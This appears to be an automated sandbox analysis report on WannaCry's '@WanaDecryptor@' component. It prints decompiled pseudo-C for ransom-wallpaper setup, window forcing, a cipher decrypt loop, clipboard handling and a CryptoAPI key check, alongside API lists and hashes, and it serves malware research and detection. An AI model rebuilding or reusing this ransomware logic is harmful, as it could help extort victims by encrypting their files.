                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                      • API String ID: 2238633743-2459060434
                                                      • Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                                      • Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
                                                      • Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                                      • Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407E80 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00407E80() {
				void _v518;
				short _v520;
				short _v540;
				void _v1038;
				char _v1040;
				long _v1060;
				void _v1558;
				short _v1560;
				long _v1580;
				int _t23;
				short _t39;
				void* _t42;
				void* _t54;
				void* _t55;

				_t39 =  *0x42179c; // 0x0
				_v1040 = _t39;
				memset( &_v1038, 0, 0x81 << 2);
				asm("stosw");
				_v1560 = _t39;
				memset( &_v1558, 0, 0x81 << 2);
				asm("stosw");
				_v520 = _t39;
				memset( &_v518, 0, 0x81 << 2);
				asm("stosw");
				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42);
				_t23 = wcslen( &_v1060);
				_t54 =  &_v1560 + 0x28;
				if(_t23 != 0) {
					_push(L"@WanaDecryptor@.bmp");
					swprintf( &_v1580, L"%s\\%s",  &_v1060);
					_t55 = _t54 + 0x10;
					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
					CopyFileW( &_v540, _t55, 0);
					return SystemParametersInfoW(0x14, 0, _t55, 1);
				} else {
					return _t23;
				}
			}

















                                                      0x00407e86
                                                      0x00407e9c
                                                      0x00407ea4
                                                      0x00407ea6
                                                      0x00407eb3
                                                      0x00407eb8
                                                      0x00407eba
                                                      0x00407eca
                                                      0x00407ed2
                                                      0x00407ed4
                                                      0x00407ee6
                                                      0x00407ef4
                                                      0x00407efa
                                                      0x00407f00
                                                      0x00407f10
                                                      0x00407f20
                                                      0x00407f26
                                                      0x00407f41
                                                      0x00407f56
                                                      0x00407f73
                                                      0x00407f08
                                                      0x00407f08
                                                      0x00407f08

                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
                                                      • wcslen.MSVCRT ref: 00407EF4
                                                      • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
                                                      • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
                                                      • String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
                                                      • API String ID: 13424474-2236924158
                                                      • Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                                      • Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
                                                      • Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                                      • Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004067F0 Relevance: 13.6, APIs: 9, Instructions: 71windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E004067F0(void* __ecx) {
				signed int _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				int _t16;
				int _t21;
				int _t22;
				int _t37;
				struct tagRECT* _t48;
				void* _t56;

				_t56 = __ecx;
				_t16 = IsIconic( *(__ecx + 0x20));
				if(_t16 == 0) {
					L00412CBC();
					return _t16;
				} else {
					_push(_t56);
					L00412DD0();
					asm("sbb eax, eax");
					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
					_t21 = GetSystemMetrics(0xb);
					_t22 = GetSystemMetrics(0xc);
					_t48 =  &_v104;
					GetClientRect( *(_t56 + 0x20), _t48);
					asm("cdq");
					asm("cdq");
					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
					L00412DB8();
					return _t37;
				}
			}















                                                      0x004067f4
                                                      0x004067fa
                                                      0x00406802
                                                      0x0040689c
                                                      0x004068a5
                                                      0x00406808
                                                      0x0040680a
                                                      0x0040680f
                                                      0x00406823
                                                      0x0040682b
                                                      0x00406839
                                                      0x0040683f
                                                      0x00406846
                                                      0x0040684c
                                                      0x00406866
                                                      0x00406879
                                                      0x00406884
                                                      0x0040688e
                                                      0x00406899
                                                      0x00406899

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                                      • String ID:
                                                      • API String ID: 1397574227-0
                                                      • Opcode ID: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                                      • Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
                                                      • Opcode Fuzzy Hash: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                                      • Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B3C0 Relevance: 12.2, APIs: 8, Instructions: 203COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 65%
                                                      			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
				void* _v4;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				struct HWND__* _v32;
				WCHAR* _v36;
				struct HWND__* _t90;
				signed int* _t100;
				signed int _t102;
				signed int _t105;
				signed int* _t109;
				signed int _t113;
				signed int _t114;
				signed int _t121;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t138;
				signed int _t143;
				signed int _t152;
				signed int _t157;
				void* _t185;
				void* _t188;
				signed int* _t191;
				void* _t204;
				signed int _t206;
				struct HWND__* _t207;
				void* _t211;
				void* _t212;
				void* _t217;
				void* _t218;
				signed int _t221;
				void* _t224;
				signed int* _t226;
				void* _t227;
				void* _t228;

				_t228 = _t227 - 0xc;
				_t124 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
				}
				_t206 = _a12;
				_t185 = 0;
				if(_t206 == 0) {
					L26:
					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
					_push(_t206);
					_t90 = FindWindowW(0, _v36); // executed
					_t207 = _t90;
					if(_t207 != 0) {
						_push(_t185);
						ShowWindow(_t207, 5);
						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
						SetForegroundWindow(_t207);
						SetFocus(_t207);
						SetActiveWindow(_t207);
						BringWindowToTop(_t207);
						_t90 = _v32;
						if(_t90 != 0) {
							ExitProcess(0);
						}
					}
					return _t90;
				} else {
					_t130 =  *(_t124 + 0x3cc);
					if(_t206 % _t130 != 0) {
						goto L26;
					} else {
						_t100 = _a16;
						if(_t100 != 1) {
							L13:
							_a16 = _t185;
							if(_t100 != 2) {
								L23:
								_t102 = _t206 / _t130;
								_t188 = _a4;
								_t221 = _a8;
								if(_t102 <= 0) {
									goto L11;
								} else {
									do {
										_push(_t221);
										_push(_t188);
										E0040B0C0(_t124);
										_t132 =  *(_t124 + 0x3cc);
										_t188 = _t188 + _t132;
										_t221 = _t221 + _t132;
										_a8 = _a8 + 1;
										_t105 = _t206 / _t132;
									} while (_a8 < _t105);
									return _t105;
								}
							} else {
								_t102 = _t206 / _t130;
								_t191 = _a8;
								_t224 = _a4;
								_a4 = _t191;
								if(_t102 <= 0) {
									goto L11;
								} else {
									while(1) {
										_t50 = _t124 + 0x3f0; // 0x444
										_push(_t191);
										E0040ADC0(_t124);
										_t109 = _t191;
										if( *((intOrPtr*)(_t124 + 4)) == 0) {
											break;
										}
										_t211 = 0;
										if( *(_t124 + 0x3cc) > 0) {
											do {
												 *_t109 =  *_t109 ^  *(_t211 + _t224);
												_t109 =  &(_t109[0]);
												_t211 = _t211 + 1;
											} while (_t211 <  *(_t124 + 0x3cc));
										}
										_t212 = _t224;
										_t56 = _t124 + 0x3f0; // 0x444
										_t138 =  *(_t124 + 0x3cc) >> 2;
										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
										_t228 = _t228 + 0x18;
										_t143 =  *(_t124 + 0x3cc);
										_t114 = _t113 / _t143;
										_t224 = _t224 + _t143;
										_v4 = _v4 + _t143;
										_t206 = _a8 + 1;
										_a8 = _t206;
										if(_t206 < _t114) {
											_t191 = _v4;
											continue;
										} else {
											return _t114;
										}
										goto L31;
									}
									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
									_t130 =  &_v24;
									_push(0x41c9c0);
									_push(_t130);
									L004130FC();
									goto L23;
								}
							}
						} else {
							_t102 = _t206 / _t130;
							_t226 = _a8;
							_a16 = 0;
							if(_t102 <= 0) {
								L11:
								return _t102;
							} else {
								while(1) {
									_push(_t226);
									_push(_a4);
									E0040B0C0(_t124);
									_t100 = _t226;
									if( *((intOrPtr*)(_t124 + 4)) == 0) {
										break;
									}
									_t217 = 0;
									if( *(_t124 + 0x3cc) > 0) {
										_t22 = _t124 - _t226 + 0x3f0; // 0x444
										_t204 = _t22;
										do {
											 *_t100 =  *_t100 ^  *(_t204 + _t100);
											_t100 =  &(_t100[0]);
											_t217 = _t217 + 1;
										} while (_t217 <  *(_t124 + 0x3cc));
									}
									_t218 = _v4;
									_t27 = _t124 + 0x3f0; // 0x444
									_t152 =  *(_t124 + 0x3cc) >> 2;
									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
									_t228 = _t228 + 0x18;
									_t157 =  *(_t124 + 0x3cc);
									_t102 = _t121 / _t157;
									_t185 = _v4 + _t157;
									_t226 = _t226 + _t157;
									_t206 = _a8 + 1;
									_v4 = _t185;
									_a8 = _t206;
									if(_t206 < _t102) {
										continue;
									} else {
										goto L11;
									}
									goto L31;
								}
								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
								_t130 =  &_v24;
								_push(0x41c9c0);
								_push(_t130);
								L004130FC();
								goto L13;
							}
						}
					}
				}
				L31:
			}








































                                                      0x0040b3c0
                                                      0x0040b3c4
                                                      0x0040b3ce
                                                      0x0040b3d9
                                                      0x0040b3e3
                                                      0x0040b3e8
                                                      0x0040b3e9
                                                      0x0040b3e9
                                                      0x0040b3ee
                                                      0x0040b3f2
                                                      0x0040b3f6
                                                      0x0040b602
                                                      0x0040b60b
                                                      0x0040b615
                                                      0x0040b61a
                                                      0x0040b61b
                                                      0x0040b624
                                                      0x0040b628
                                                      0x0040b62e
                                                      0x0040b632
                                                      0x0040b634
                                                      0x0040b638
                                                      0x0040b651
                                                      0x0040b660
                                                      0x0040b663
                                                      0x0040b66a
                                                      0x0040b671
                                                      0x0040b678
                                                      0x0040b67e
                                                      0x0040b685
                                                      0x0040b689
                                                      0x0040b689
                                                      0x0040b685
                                                      0x0040b690
                                                      0x0040b3fc
                                                      0x0040b3fc
                                                      0x0040b40a
                                                      0x00000000
                                                      0x0040b410
                                                      0x0040b410
                                                      0x0040b417
                                                      0x0040b4ed
                                                      0x0040b4f0
                                                      0x0040b4f4
                                                      0x0040b5ba
                                                      0x0040b5be
                                                      0x0040b5c0
                                                      0x0040b5c4
                                                      0x0040b5ca
                                                      0x00000000
                                                      0x0040b5d0
                                                      0x0040b5d0
                                                      0x0040b5d0
                                                      0x0040b5d1
                                                      0x0040b5d4
                                                      0x0040b5d9
                                                      0x0040b5e3
                                                      0x0040b5e5
                                                      0x0040b5ea
                                                      0x0040b5f0
                                                      0x0040b5f2
                                                      0x0040b5ff
                                                      0x0040b5ff
                                                      0x0040b4fa
                                                      0x0040b4fe
                                                      0x0040b500
                                                      0x0040b504
                                                      0x0040b508
                                                      0x0040b50e
                                                      0x00000000
                                                      0x0040b510
                                                      0x0040b516
                                                      0x0040b516
                                                      0x0040b51c
                                                      0x0040b520
                                                      0x0040b528
                                                      0x0040b52c
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b534
                                                      0x0040b538
                                                      0x0040b53a
                                                      0x0040b541
                                                      0x0040b549
                                                      0x0040b54a
                                                      0x0040b54b
                                                      0x0040b53a
                                                      0x0040b555
                                                      0x0040b559
                                                      0x0040b55f
                                                      0x0040b56f
                                                      0x0040b56f
                                                      0x0040b571
                                                      0x0040b57b
                                                      0x0040b57f
                                                      0x0040b581
                                                      0x0040b589
                                                      0x0040b58a
                                                      0x0040b590
                                                      0x0040b512
                                                      0x00000000
                                                      0x0040b592
                                                      0x0040b599
                                                      0x0040b599
                                                      0x00000000
                                                      0x0040b590
                                                      0x0040b5a5
                                                      0x0040b5ab
                                                      0x0040b5af
                                                      0x0040b5b4
                                                      0x0040b5b5
                                                      0x00000000
                                                      0x0040b5b5
                                                      0x0040b50e
                                                      0x0040b41d
                                                      0x0040b429
                                                      0x0040b42b
                                                      0x0040b42f
                                                      0x0040b435
                                                      0x0040b4c5
                                                      0x0040b4cc
                                                      0x0040b43b
                                                      0x0040b43b
                                                      0x0040b43f
                                                      0x0040b440
                                                      0x0040b443
                                                      0x0040b44b
                                                      0x0040b44f
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b457
                                                      0x0040b45b
                                                      0x0040b461
                                                      0x0040b461
                                                      0x0040b467
                                                      0x0040b46e
                                                      0x0040b476
                                                      0x0040b477
                                                      0x0040b478
                                                      0x0040b467
                                                      0x0040b482
                                                      0x0040b488
                                                      0x0040b48e
                                                      0x0040b49e
                                                      0x0040b49e
                                                      0x0040b4a0
                                                      0x0040b4aa
                                                      0x0040b4b0
                                                      0x0040b4b2
                                                      0x0040b4b4
                                                      0x0040b4b5
                                                      0x0040b4b9
                                                      0x0040b4bf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b4bf
                                                      0x0040b4d8
                                                      0x0040b4de
                                                      0x0040b4e2
                                                      0x0040b4e7
                                                      0x0040b4e8
                                                      0x00000000
                                                      0x0040b4e8
                                                      0x0040b435
                                                      0x0040b417
                                                      0x0040b40a
                                                      0x00000000

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                                      • Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
                                                      • Opcode Fuzzy Hash: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                                      • Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407C30 Relevance: 12.0, APIs: 8, Instructions: 48clipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00407C30(void* __ecx) {
				int _t9;
				void* _t15;
				void* _t22;
				signed int _t25;
				signed int _t26;
				void* _t39;
				void* _t40;

				_t39 = __ecx;
				_t9 = OpenClipboard( *(__ecx + 0x20));
				if(_t9 == 0) {
					return _t9;
				} else {
					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
					if(_t22 != 0) {
						EmptyClipboard();
						_t40 =  *(_t39 + 0x508);
						_t15 = GlobalLock(_t22);
						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
						_t26 = _t25 >> 2;
						memcpy(_t15, _t40, _t26 << 2);
						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
						GlobalUnlock(_t22);
						SetClipboardData(1, _t22);
						return CloseClipboard();
					}
					return CloseClipboard();
				}
			}










                                                      0x00407c32
                                                      0x00407c38
                                                      0x00407c40
                                                      0x00407cab
                                                      0x00407c42
                                                      0x00407c55
                                                      0x00407c59
                                                      0x00407c66
                                                      0x00407c6c
                                                      0x00407c79
                                                      0x00407c7f
                                                      0x00407c86
                                                      0x00407c89
                                                      0x00407c90
                                                      0x00407c92
                                                      0x00407c9b
                                                      0x00000000
                                                      0x00407ca8
                                                      0x00407c63
                                                      0x00407c63

                                                      APIs
                                                      • OpenClipboard.USER32(?), ref: 00407C38
                                                      • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
                                                      • CloseClipboard.USER32 ref: 00407C5B
                                                      • EmptyClipboard.USER32 ref: 00407C66
                                                      • GlobalLock.KERNEL32(00000000), ref: 00407C79
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
                                                      • CloseClipboard.USER32 ref: 00407CA1
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
                                                      • String ID:
                                                      • API String ID: 142981918-0
                                                      • Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                                      • Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
                                                      • Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                                      • Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004047C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154encryptionstringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 47%
                                                      			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				long* _v8;
				char _v20;
				void _v539;
				char _v540;
				char _v543;
				char _v544;
				intOrPtr _v548;
				char _v552;
				int _v556;
				intOrPtr _v560;
				void* __ebx;
				char _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t63;
				intOrPtr _t67;
				signed int _t76;
				unsigned int _t78;
				signed int _t79;
				long* _t85;
				char _t92;
				void* _t116;
				intOrPtr _t118;
				void* _t120;
				void* _t121;

				_push(0xffffffff);
				_push(0x415e38);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				_t63 = __ecx;
				_v560 = __ecx;
				_t38 = "TESTDATA"; // 0x54534554
				_v552 = _t38;
				_t67 =  *0x420c64; // 0x41544144
				_v548 = _t67;
				_t92 =  *0x420c68; // 0x0
				_v544 = _t92;
				_v543 = 0;
				_v540 = 0;
				memset( &_v539, 0, 0x7f << 2);
				_t120 = _t118 - 0x21c + 0xc;
				asm("stosw");
				asm("stosb");
				asm("repne scasb");
				_v556 = 0xbadbac;
				if(E004046B0(_t63) == 0) {
					L6:
					 *[fs:0x0] = _v20;
					return 0;
				} else {
					_v8 = 0;
					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
					_t121 = _t120 + 0xc;
					if(_t45 == 0) {
						L12:
						_push(0xffffffff);
						_push( &_v20);
						goto L5;
					} else {
						_t76 = _a8;
						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
						_t121 = _t121 + 0xc;
						if(_t48 == 0) {
							goto L12;
						} else {
							asm("repne scasb");
							_t78 =  !(_t76 | 0xffffffff);
							_t116 =  &_v552 - _t78;
							_t79 = _t78 >> 2;
							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
							_t121 = _t121 + 0x18;
							_push(0x200);
							_push( &_v556);
							_push( &_v540);
							_push(0);
							_push(1);
							_push(0);
							_push( *((intOrPtr*)(_t63 + 8)));
							if( *0x4217cc() != 0) {
								_t85 =  *(_t63 + 0xc);
								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
									asm("repne scasb");
									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
										_v8 = 0xffffffff;
										E004049A6(_t63);
										goto L6;
									} else {
										_push(0xffffffff);
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L5;
								}
							} else {
								_push(0xffffffff);
								_push( &_v20);
								L5:
								L00413056();
								goto L6;
							}
						}
					}
				}
			}




























                                                      0x004047c3
                                                      0x004047c5
                                                      0x004047ca
                                                      0x004047d5
                                                      0x004047d6
                                                      0x004047e6
                                                      0x004047e8
                                                      0x004047ee
                                                      0x004047f3
                                                      0x004047f9
                                                      0x004047ff
                                                      0x00404805
                                                      0x0040480b
                                                      0x00404811
                                                      0x00404818
                                                      0x0040482c
                                                      0x0040482c
                                                      0x0040482e
                                                      0x00404830
                                                      0x0040483c
                                                      0x00404841
                                                      0x00404850
                                                      0x004048f3
                                                      0x004048f8
                                                      0x00404905
                                                      0x00404856
                                                      0x00404856
                                                      0x00404869
                                                      0x0040486e
                                                      0x00404873
                                                      0x00404995
                                                      0x00404995
                                                      0x0040499a
                                                      0x00000000
                                                      0x00404879
                                                      0x0040487c
                                                      0x00404885
                                                      0x0040488a
                                                      0x0040488f
                                                      0x00000000
                                                      0x00404895
                                                      0x004048a6
                                                      0x004048a8
                                                      0x004048ae
                                                      0x004048b2
                                                      0x004048bc
                                                      0x004048bc
                                                      0x004048be
                                                      0x004048c9
                                                      0x004048d0
                                                      0x004048d1
                                                      0x004048d3
                                                      0x004048d5
                                                      0x004048da
                                                      0x004048e3
                                                      0x0040491c
                                                      0x00404928
                                                      0x0040493d
                                                      0x0040495c
                                                      0x00404984
                                                      0x0040498b
                                                      0x00000000
                                                      0x0040495e
                                                      0x0040495e
                                                      0x00404963
                                                      0x00404964
                                                      0x00404974
                                                      0x00404981
                                                      0x00404981
                                                      0x0040492a
                                                      0x0040492a
                                                      0x0040492f
                                                      0x00000000
                                                      0x0040492f
                                                      0x004048e5
                                                      0x004048e5
                                                      0x004048ea
                                                      0x004048eb
                                                      0x004048eb
                                                      0x00000000
                                                      0x004048f0
                                                      0x004048e3
                                                      0x0040488f
                                                      0x00404873

                                                      APIs
                                                        • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                                        • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                                        • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                                        • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                                      • _local_unwind2.MSVCRT ref: 004048EB
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
                                                      • strncmp.MSVCRT(00000000,?), ref: 00404951
                                                      • _local_unwind2.MSVCRT ref: 00404964
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
